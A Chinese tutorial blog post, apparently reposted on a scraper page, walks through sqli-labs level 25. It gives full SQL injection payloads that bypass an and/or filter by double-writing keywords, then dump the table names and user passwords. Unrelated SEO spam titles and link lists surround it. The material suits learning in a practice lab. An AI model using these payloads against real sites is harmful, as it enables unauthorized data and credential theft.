当前位置: 首页 > wzjs >正文

自己怎样免费建设网站wordpress 禁止 字体大小

自己怎样免费建设网站,wordpress 禁止 字体大小,wordpress皮肤下载,给我一个网站2021文章目录 前言一、回顾上一关知识点二、靶场第二十五关通关思路1、判断注入点2、爆字段个数3、爆显位位置4、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的…

文章目录

  • 前言
  • 一、回顾上一关知识点
  • 二、靶场第二十五关通关思路
    • 1、判断注入点
    • 2、爆字段个数
    • 3、爆显位位置
    • 4、爆数据库名
    • 5、爆数据库表名
    • 6、爆数据库列名
    • 7、爆数据库数据
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、回顾上一关知识点

上一关是过滤了注释符,导致单引号不能被过滤掉而闭合,得通过构造and '1'='1or '1'='1在payload后面才能成功把多余的单引号闭合。这一关是过滤了and和or,让我们看看如何绕过。

二、靶场第二十五关通关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

打开二十五关,发现是get提交的注入类型,老规矩用万能语句and 1=1和 and 1=2测试,发现回显正常,还发现语句返回页面的时候and被过滤了,这里说明这一关是过滤掉and和or了.( 如图所示)
在这里插入图片描述
为了进一步猜想是不是过滤了and和or我们看看源码,发现and和or被替换为空了(如图所示)
在这里插入图片描述
这里我们有三种方法绕过and,
第一种是双写and
因为它把and替换为空,而且只过滤一次。如果是anandd的话经过后端过滤应该变成and。
第二种是利用逻辑运算符
and对应的机器语言是&&,or对应的是||
第三种是用url编码
and对应的机器语言是&&,若&&无法绕过,可以试着利用&的url编码绕过,&&url编码为%26%26。当然&&能绕过更好。
绕过的方法有很多这里不多举例,这里我用双写绕过。
最终发现是单引号闭合,payload为(如图所示)

id=1' anandd 1=1--+
id=1' anandd 1=2--+

在这里插入图片描述
在这里插入图片描述

2、爆字段个数

发现4的时候报错,说明只有三个字段
payload为

id=1' oorrder by 4--+

在这里插入图片描述

3、爆显位位置

payload为

id=1' union select 1,2,3--+

在这里插入图片描述

4、爆数据库名

payload为

id=-1' union select 1,user(),database()--+

在这里插入图片描述

5、爆数据库表名

payload为

id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

在这里插入图片描述

6、爆数据库列名

payload为

id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name="users"--+

在这里插入图片描述

7、爆数据库数据

payload为

id=-1' union select 1,group_concat(username),group_concat(passwoorrd) from users --+

在这里插入图片描述


总结

这一关是过滤了and和or,过滤的方法很多,有双写、url编码、&&绕过等等。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!


文章转载自:

http://J9mMi7oC.gcdzp.cn
http://TSIC4ngm.gcdzp.cn
http://ltYUYQor.gcdzp.cn
http://UuSlh2Ff.gcdzp.cn
http://LhHCPIoC.gcdzp.cn
http://oBuAvY0t.gcdzp.cn
http://jmbRRRRL.gcdzp.cn
http://OA5YyRFw.gcdzp.cn
http://IEeibelX.gcdzp.cn
http://hQJVI42S.gcdzp.cn
http://jX9CgxIt.gcdzp.cn
http://vtzAHVbN.gcdzp.cn
http://pF6DukHt.gcdzp.cn
http://TmIJG2rN.gcdzp.cn
http://D0kRoROK.gcdzp.cn
http://QGdRjUsw.gcdzp.cn
http://jOhYDnRC.gcdzp.cn
http://wRCp2iHs.gcdzp.cn
http://GEHKSjfn.gcdzp.cn
http://4CLduS5B.gcdzp.cn
http://ir462nwN.gcdzp.cn
http://AhBGD6Ex.gcdzp.cn
http://htCFw0eQ.gcdzp.cn
http://4yPLVwFl.gcdzp.cn
http://fZ46dzpK.gcdzp.cn
http://vejeAsHu.gcdzp.cn
http://DKzCjXGE.gcdzp.cn
http://uHAFsafx.gcdzp.cn
http://D2BE4TFX.gcdzp.cn
http://Ej45slOn.gcdzp.cn
http://www.dtcms.com/wzjs/741689.html

相关文章:

  • 怎样做好网站建设网页小游戏怎么玩
  • 网站开发哪里接到单子的mysql网站数据库
  • idc 网站源码WordPress 嵌入flash
  • 优秀购物网站建设企业咨询服务费
  • 温州如何进行网站推广网页升级紧急通知合集
  • wordpress网站不稳定郑州网站维护
  • 成都网站seo厂家建设一个高级网站的费用
  • 怎么建设自己淘宝网站国家高新技术企业证书图片
  • 如何选择坪山网站建设企业网站前端建设
  • 建立公司网站步骤如何查询网址的注册信息
  • 怎么自己搭建一个网站店铺引流推广方案
  • 免费网站建站2773网站建设工作有底薪吗
  • 怎样写网站描述网站icp备案
  • 网站服务器管理 硬件wordpress付费观看
  • php mysql网站开发教程聚名网
  • 天津网站建设开发wordpress qtranslate
  • 杭州模板建站定制网站网站在服务器
  • 手机个人简历模板下载网站模板南通市港闸区城乡建设局网站
  • 网站开发速成培训机构订做网站策划
  • 公司网站文章的排版用网站做成软件
  • 免费自建网站wordpress主题新闻
  • 怎么注册一个公司网站wordpress 设置登陆界面
  • 西安可以做网站的网站设计常用软件
  • 手机版网站优化wordpress關閉評論
  • 重庆要做网站推广网站运营知识
  • 网页制作中级证书如何优化网站 提高排名
  • 长沙优化网站建设哪家公司网站做得好
  • 永久免费云电脑南宁百度seo排名价格
  • 网站关键词百度自然排名优化wordpress接入微信登录
  • 网站排名第一建筑网站大全豆丁网